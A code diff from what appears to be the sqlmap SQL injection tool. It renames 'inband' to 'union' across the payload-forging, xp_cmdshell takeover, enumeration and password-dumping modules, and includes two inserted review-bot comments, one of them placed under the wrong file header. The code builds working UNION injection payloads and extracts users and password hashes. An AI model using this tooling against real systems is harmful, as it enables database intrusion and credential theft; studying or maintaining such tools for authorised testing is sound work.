diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index e51714482..e6aada74d 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -436,7 +436,7 @@ def checkSqlInjection(place, parameter, value):
 # Test for UNION injection and set the sample
 # payload as well as the vector.
 # NOTE: vector is set to a tuple with 6 elements,
- # used afterwards by Agent.forgeInbandQuery()
+ # used afterwards by Agent.forgeUnionQuery()
 # method to forge the UNION query payload
 configUnion(test.request.char, test.request.columns)
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index b1e8c80db..aa9cf6b76 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -133,7 +133,7 @@ def __formatInjection(inj):
 if stype == PAYLOAD.TECHNIQUE.UNION:
 count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
 title = re.sub(r"\d+ to \d+", str(count), title)
- vector = agent.forgeInbandQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
+ vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
 if count == 1:
 title = title.replace("columns", "column")
 elif comment:
diff --git a/lib/core/agent.py b/lib/core/agent.py
index bedc8e33d..e17bd4b39 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -561,7 +561,7 @@ class Agent:
 return concatenatedQuery
- def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None):
+ def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None):
 """
 Take in input an query (pseudo query) string and return its processed UNION ALL SELECT query.
@@ -602,20 +602,20 @@ class Agent: if Backend.getIdentifiedDbms() in (DBMS.MYSQL, ): limitOriginal = "%s " % (queries[Backend.getIdentifiedDbms()].limit.query % (0, 1)) - inbandQuery = self.prefixQuery("%sUNION ALL SELECT " % limitOriginal, prefix=prefix) + unionQuery = self.prefixQuery("%sUNION ALL SELECT " % limitOriginal, prefix=prefix) if limited: - inbandQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count)) - inbandQuery += fromTable - inbandQuery = self.suffixQuery(inbandQuery, comment, suffix) + unionQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count)) + unionQuery += fromTable + unionQuery = self.suffixQuery(unionQuery, comment, suffix) - return inbandQuery + return unionQuery topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I) if topNumRegex: topNum = topNumRegex.group(1) query = query[len("TOP %s " % topNum):] - inbandQuery += "TOP %s " % topNum + unionQuery += "TOP %s " % topNum intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I) 
@@ -623,51 +623,51 @@ class Agent: intoRegExp = intoRegExp.group(1) query = query[:query.index(intoRegExp)] - if fromTable and inbandQuery.endswith(fromTable): - inbandQuery = inbandQuery[:-len(fromTable)] + if fromTable and unionQuery.endswith(fromTable): + unionQuery = unionQuery[:-len(fromTable)] for element in xrange(0, count): if element > 0: - inbandQuery += ',' + unionQuery += ',' if element == position: if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "): conditionIndex = query.index(" FROM ") - inbandQuery += query[:conditionIndex] + unionQuery += query[:conditionIndex] else: - inbandQuery += query + unionQuery += query else: - inbandQuery += char + unionQuery += char if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "): conditionIndex = query.index(" FROM ") - inbandQuery += query[conditionIndex:] + unionQuery += query[conditionIndex:] if fromTable: - if " FROM " not in inbandQuery or "(CASE " in inbandQuery or "(IIF" in inbandQuery: - inbandQuery += fromTable + if " FROM " not in unionQuery or "(CASE " in unionQuery or "(IIF" in unionQuery: + unionQuery += fromTable if intoRegExp: - inbandQuery += intoRegExp + unionQuery += intoRegExp if multipleUnions: - inbandQuery += " UNION ALL SELECT " + unionQuery += " UNION ALL SELECT " for element in xrange(count): if element > 0: - inbandQuery += ',' + unionQuery += ',' if element == position: - inbandQuery += multipleUnions + unionQuery += multipleUnions else: - inbandQuery += char + unionQuery += char if fromTable: - inbandQuery += fromTable + unionQuery += fromTable - inbandQuery = self.suffixQuery(inbandQuery, comment, suffix) + unionQuery = self.suffixQuery(unionQuery, comment, suffix) - return inbandQuery + return unionQuery def limitQuery(self, num, query, field=None, uniqueField=None): """ 
diff --git a/lib/core/common.py b/lib/core/common.py
index 245324d8c..c74219b88 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1150,7 +1150,7 @@ def getLimitRange(count, dump=False, plusOne=False):
 def parseUnionPage(page):
 """
- Returns resulting items from inband query inside provided page content
+ Returns resulting items from union query inside provided page content
 """
 if page is None:
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 471bc7f99..7d77a128c 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -435,7 +435,7 @@ MAX_DNS_LABEL = 63
 # Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content)
 DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.letters)
-# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION/inband injections)
+# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
 MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
 # Maximum response total page size (trimmed if larger)
diff --git a/lib/request/inject.py b/lib/request/inject.py
index dd6390843..ea843b821 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -347,9 +347,9 @@ def __goBooleanProxy(expression):
 return output
-def __goInband(expression, unpack=True, dump=False):
+def __goUnion(expression, unpack=True, dump=False):
 """
- Retrieve the output of a SQL query taking advantage of an inband SQL
+ Retrieve the output of a SQL query taking advantage of an union SQL
 injection vulnerability on the affected parameter.
 """
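Review bot: The rewritten docstring line in `__goUnion` reads `an union SQL`, but "union" begins with a consonant sound and takes the article "a", so the added line should be `Retrieve the output of a SQL query taking advantage of a union SQL`. The same wording is introduced by the later hunks in the docstrings of `__unionTestByCharBruteforce`, `unionTest` and `unionUse`, which should receive the same one-word fix. The body of `__goUnion` continues outside this hunk.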
@@ -360,12 +360,10 @@ def __goInband(expression, unpack=True, dump=False):
 return output
-def getValue(expression, blind=True, inband=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):
+def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):
 """
 Called each time sqlmap inject a SQL query on the SQL injection
- affected parameter. It can call a function to retrieve the output
- through inband SQL injection (if selected) and/or blind SQL injection
- (if selected).
+ affected parameter.
 """
 kb.safeCharEncode = safeCharEncode
@@ -400,9 +398,9 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse
 query = query.replace("DISTINCT ", "")
 if not conf.forceDns:
- if inband and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
+ if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
 kb.technique = PAYLOAD.TECHNIQUE.UNION
- value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
+ value = __goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
 count += 1
 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 2b67abb8e..6b2f1c9a3 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
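Review bot: Renaming the keyword parameter `inband` to `union` in the `getValue` signature breaks any caller that still passes `inband=...`: it now fails with a TypeError for an unexpected keyword argument, and a call site missed by the sweep only surfaces at runtime on that code path. A two-line shim keeps old callers working for a transition period: append `**kwargs` to the signature and start the body with `union = kwargs.pop("inband", union)` (rejecting any other leftover key so typos are still caught). The docstring was also reduced to `Called each time sqlmap inject a SQL query on the SQL injection affected parameter.`, which drops the explanation of the technique flags; keeping one sentence that names `blind`, `union`, `error` and `time` and says they are tried in turn until a value is found, as the `count >= MAX_TECHNIQUES_PER_VALUE` test in the second hunk suggests, would replace what the commit removed. The body of `getValue` runs well past both hunks.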
@@ -213,12 +213,12 @@ class xp_cmdshell:
 output = inject.getValue(query, resumeValue=False, blind=False, time=False)
 else:
 output = []
- count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
+ count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
 if isNumPosStrValue(count):
 for index in getLimitRange(count):
 query = agent.limitQuery(index, query, self.tblField)
- output.append(inject.getValue(query, inband=False, error=False, resumeValue=False))
+ output.append(inject.getValue(query, union=False, error=False, resumeValue=False))
 inject.goStacked("DELETE FROM %s" % self.cmdTblName)
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index f45dfb09c..e32c06217 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -101,7 +101,7 @@ def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where
 pages = {}
 for count in xrange(lowerCount, upperCount+1):
- query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
+ query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
 payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
 page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
 if not isNullValue(kb.uChar):
@@ -166,7 +166,7 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL # For each column of the table (# of NULL) perform a request using # the UNION ALL SELECT statement to test it the target url is - # affected by an exploitable inband SQL injection vulnerability + # affected by an exploitable union SQL injection vulnerability for position in positions: # Prepare expression with delimiters randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) @@ -174,8 +174,8 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) randQueryUnescaped = unescaper.unescape(randQueryProcessed) - # Forge the inband SQL injection request - query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) + # Forge the union SQL injection request + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request @@ -196,8 +196,8 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2) - # Confirm that it is a full inband SQL injection - query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) + # Confirm that it is a full union SQL injection + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request 
@@ -210,7 +210,7 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) # Check for limited row output - query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request @@ -239,11 +239,11 @@ def __unionConfirm(comment, place, parameter, prefix, suffix, count): validPayload = None vector = None - # Confirm the inband SQL injection and get the exact column + # Confirm the union SQL injection and get the exact column # position which can be used to extract data validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count) - # Assure that the above function found the exploitable full inband + # Assure that the above function found the exploitable full union # SQL injection position if not validPayload: validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE) @@ -252,7 +252,7 @@ def __unionConfirm(comment, place, parameter, prefix, suffix, count): def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix): """ - This method tests if the target url is affected by an inband + This method tests if the target url is affected by an union SQL injection vulnerability. The test is done up to 50 columns on the target database table """ 
@@ -297,7 +297,7 @@ def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix
 def unionTest(comment, place, parameter, value, prefix, suffix):
 """
- This method tests if the target url is affected by an inband
+ This method tests if the target url is affected by an union
 SQL injection vulnerability. The test is done up to 3*50 times
 """
diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py
index 1eb68bdbb..72f71c362 100644
--- a/lib/techniques/union/use.py
+++ b/lib/techniques/union/use.py
@@ -48,7 +48,7 @@ from lib.core.unescaper import unescaper
 from lib.request.connect import Connect as Request
 def __oneShotUnionUse(expression, unpack=True, limited=False):
- retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as inband data is stored raw unconverted
+ retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted
 threadData = getCurrentThreadData()
 threadData.resumed = retVal is not None
@@ -59,10 +59,10 @@ def __oneShotUnionUse(expression, unpack=True, limited=False):
 where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else None
- # Forge the inband SQL injection request
+ # Forge the union SQL injection request
 vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector
 kb.unionDuplicates = vector[7]
- query = agent.forgeInbandQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
+ query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
 payload = agent.payload(newValue=query, where=where)
 # Perform the request
@@ -90,7 +90,7 @@ def __oneShotUnionUse(expression, unpack=True, limited=False): if retVal is not None: retVal = getUnicode(retVal, kb.pageEncoding) - # Special case when DBMS is Microsoft SQL Server and error message is used as a result of inband injection + # Special case when DBMS is Microsoft SQL Server and error message is used as a result of union injection if Backend.isDbms(DBMS.MSSQL) and wasLastRequestDBMSError(): retVal = htmlunescape(retVal).replace("
", "\n") @@ -140,9 +140,9 @@ def configUnion(char=None, columns=None): def unionUse(expression, unpack=True, dump=False): """ - This function tests for an inband SQL injection on the target + This function tests for an union SQL injection on the target url then call its subsidiary function to effectively perform an - inband SQL injection on the affected url + union SQL injection on the affected url """ initTechnique(PAYLOAD.TECHNIQUE.UNION) @@ -341,7 +341,7 @@ def unionUse(expression, unpack=True, dump=False): kb.suppressResumeInfo = False if not value and not abortedFlag: - expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full inband doesn't play well with ORDER BY + expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full union doesn't play well with ORDER BY value = __oneShotUnionUse(expression, unpack) duration = calculateDeltaSeconds(start) diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py index 6c47b189c..04f438e18 100644 --- a/lib/utils/pivotdumptable.py +++ b/lib/utils/pivotdumptable.py @@ -35,7 +35,7 @@ def pivotDumpTable(table, colList, count=None, blind=True): if count is None: query = dumpNode.count % table - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) if isinstance(count, basestring) and count.isdigit(): count = int(count) 
@@ -65,7 +65,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
 logger.info(infoMsg)
 query = dumpNode.count2 % (column, table)
- value = inject.getValue(query, blind=blind, inband=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
+ value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
 if isNumPosStrValue(value):
 validColumnList = True
@@ -110,7 +110,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
 else:
 query = dumpNode.query2 % (column, table, colList[0], pivotValue)
- value = unArrayizeValue(inject.getValue(query, blind=blind, time=blind, inband=not blind, error=not blind))
+ value = unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind))
 if column == colList[0]:
 if isNoneValue(value):
diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py
index bedc60e14..385a3f29b 100644
--- a/plugins/dbms/mssqlserver/enumeration.py
+++ b/plugins/dbms/mssqlserver/enumeration.py
@@ -119,7 +119,7 @@ class Enumeration(GenericEnumeration):
 for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3):
 _ = query.replace("%s", db)
- count = inject.getValue(_, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
+ count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
 if not isNoneValue(count):
 break
@@ -135,7 +135,7 @@ class Enumeration(GenericEnumeration): for index in xrange(int(count)): _ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db) % index - table = inject.getValue(_, inband=False, error=False) + table = inject.getValue(_, union=False, error=False) if not isNoneValue(table): kb.hintValue = table table = safeSQLIdentificatorNaming(table, True) @@ -220,7 +220,7 @@ class Enumeration(GenericEnumeration): query = rootQuery.blind.count query = query.replace("%s", db) query += " AND %s" % tblQuery - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no table" @@ -239,7 +239,7 @@ class Enumeration(GenericEnumeration): query = query.replace("%s", db) query += " AND %s" % tblQuery query = agent.limitQuery(index, query, tblCond) - tbl = inject.getValue(query, inband=False, error=False) + tbl = inject.getValue(query, union=False, error=False) kb.hintValue = tbl foundTbls[db].append(tbl) @@ -367,7 +367,7 @@ class Enumeration(GenericEnumeration): query = query % (db, db, db, db, db, db) query += " AND %s" % colQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db) - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no tables contain column" 
@@ -387,7 +387,7 @@ class Enumeration(GenericEnumeration): query += " AND %s" % colQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db) query = agent.limitQuery(index, query, colCond.replace("[DB]", db)) - tbl = inject.getValue(query, inband=False, error=False) + tbl = inject.getValue(query, union=False, error=False) kb.hintValue = tbl tbl = safeSQLIdentificatorNaming(tbl, True) diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py index c4771d2b3..ea0d061d8 100644 --- a/plugins/dbms/oracle/enumeration.py +++ b/plugins/dbms/oracle/enumeration.py @@ -119,7 +119,7 @@ class Enumeration(GenericEnumeration): query = rootQuery.blind.count2 % queryUser else: query = rootQuery.blind.count % queryUser - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): if count != 0 and not query2: @@ -145,7 +145,7 @@ class Enumeration(GenericEnumeration): query = rootQuery.blind.query2 % (queryUser, index) else: query = rootQuery.blind.query % (queryUser, index) - role = inject.getValue(query, inband=False, error=False) + role = inject.getValue(query, union=False, error=False) # In Oracle we get the list of roles as string roles.add(role) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index f1a2a08b2..5f2aef7b1 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -116,7 +116,7 @@ class Databases: query = rootQuery.blind.count2 else: query = rootQuery.blind.count - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): errMsg = "unable to retrieve the number of databases" 
@@ -132,7 +132,7 @@ class Databases: query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index - db = inject.getValue(query, inband=False, error=False) + db = inject.getValue(query, union=False, error=False) if db: kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db)) @@ -300,7 +300,7 @@ class Databases: else: query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db) - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if count == 0: warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db) @@ -329,7 +329,7 @@ class Databases: else: query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index) - table = inject.getValue(query, inband=False, error=False) + table = inject.getValue(query, union=False, error=False) if not isNoneValue(table): kb.hintValue = table table = safeSQLIdentificatorNaming(table, True) @@ -593,11 +593,11 @@ class Databases: elif Backend.isDbms(DBMS.SQLITE): query = rootQuery.blind.query % tbl - value = inject.getValue(query, inband=False, error=False) + value = inject.getValue(query, union=False, error=False) parseSqliteTableSchema(value) return kb.data.cachedColumns - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): errMsg = "unable to retrieve the number of columns " @@ -629,7 +629,7 @@ class Databases: field = None query = agent.limitQuery(index, query, field, field) - column = inject.getValue(query, inband=False, error=False) + column = inject.getValue(query, union=False, error=False) if not isNoneValue(column): if not onlyColNames: 
@@ -643,7 +643,7 @@ class Databases: elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query2 % (tbl, column) - colType = inject.getValue(query, inband=False, error=False) + colType = inject.getValue(query, union=False, error=False) if Backend.isDbms(DBMS.FIREBIRD): colType = FIREBIRD_TYPES.get(colType, colType) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index e94c84744..6e6ee076d 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -210,7 +210,7 @@ class Entries: else: query = rootQuery.blind.count % (conf.db, tbl) - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) lengths = {} entries = {} @@ -255,7 +255,7 @@ class Entries: if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: for column in colList: - if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), inband=False, error=False) == '0': + if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0': emptyColumns.append(column) debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) debugMsg += "dumped as it appears to be empty" @@ -284,7 +284,7 @@ class Entries: elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (index, column, tbl) - value = NULL if column in emptyColumns else inject.getValue(query, inband=False, error=False, dump=True) + value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True) value = '' if value is None else value _ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)) diff --git a/plugins/generic/search.py b/plugins/generic/search.py index 40ed6ae51..c26894476 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py 
@@ -103,7 +103,7 @@ class Search: query += dbQuery query += exclDbsQuery - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no database" @@ -127,7 +127,7 @@ class Search: query += ") AS foobar" query = agent.limitQuery(index, query, dbCond) - value = inject.getValue(query, inband=False, error=False) + value = inject.getValue(query, union=False, error=False) value = safeSQLIdentificatorNaming(value) foundDbs.append(value) @@ -213,7 +213,7 @@ class Search: query = rootQuery.blind.count query += tblQuery query += whereDbsQuery - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no databases have table" @@ -234,7 +234,7 @@ class Search: query += ") AS foobar" query = agent.limitQuery(index, query) - foundDb = inject.getValue(query, inband=False, error=False) + foundDb = inject.getValue(query, union=False, error=False) foundDb = safeSQLIdentificatorNaming(foundDb) if foundDb not in foundTbls: @@ -258,7 +258,7 @@ class Search: query = rootQuery.blind.count2 query = query % unsafeSQLIdentificatorNaming(db) query += " AND %s" % tblQuery - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no table" 
@@ -278,7 +278,7 @@ class Search: query += " AND %s" % tblQuery query = agent.limitQuery(index, query) - foundTbl = inject.getValue(query, inband=False, error=False) + foundTbl = inject.getValue(query, union=False, error=False) kb.hintValue = foundTbl foundTbl = safeSQLIdentificatorNaming(foundTbl, True) foundTbls[db].append(foundTbl) @@ -431,7 +431,7 @@ class Search: query += colQuery query += whereDbsQuery query += whereTblsQuery - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no databases have tables containing column" @@ -452,7 +452,7 @@ class Search: if Backend.isDbms(DBMS.DB2): query += ") AS foobar" query = agent.limitQuery(index, query) - db = inject.getValue(query, inband=False, error=False) + db = inject.getValue(query, union=False, error=False) db = safeSQLIdentificatorNaming(db) if db not in dbs: @@ -487,7 +487,7 @@ class Search: query = query % db query += " AND %s" % colQuery query += whereTblsQuery - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no tables contain column" @@ -507,7 +507,7 @@ class Search: query += " AND %s" % colQuery query += whereTblsQuery query = agent.limitQuery(index, query) - tbl = inject.getValue(query, inband=False, error=False) + tbl = inject.getValue(query, union=False, error=False) kb.hintValue = tbl tbl = safeSQLIdentificatorNaming(tbl, True) diff --git a/plugins/generic/users.py b/plugins/generic/users.py index ff5838733..708b8c5e5 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py 
@@ -111,7 +111,7 @@ class Users: else: query = rootQuery.blind.count - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): errMsg = "unable to retrieve the number of database users" @@ -127,7 +127,7 @@ class Users: query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index - user = inject.getValue(query, inband=False, error=False) + user = inject.getValue(query, union=False, error=False) if user: kb.data.cachedUsers.append(user) @@ -252,7 +252,7 @@ class Users: else: query = rootQuery.blind.count % user - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of password " @@ -277,7 +277,7 @@ class Users: else: query = rootQuery.blind.query % (user, index) - password = inject.getValue(query, inband=False, error=False) + password = inject.getValue(query, union=False, error=False) password = parsePasswordHash(password) passwords.append(password) @@ -467,7 +467,7 @@ class Users: else: query = rootQuery.blind.count % user - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): if Backend.isDbms(DBMS.ORACLE) and not query2: 
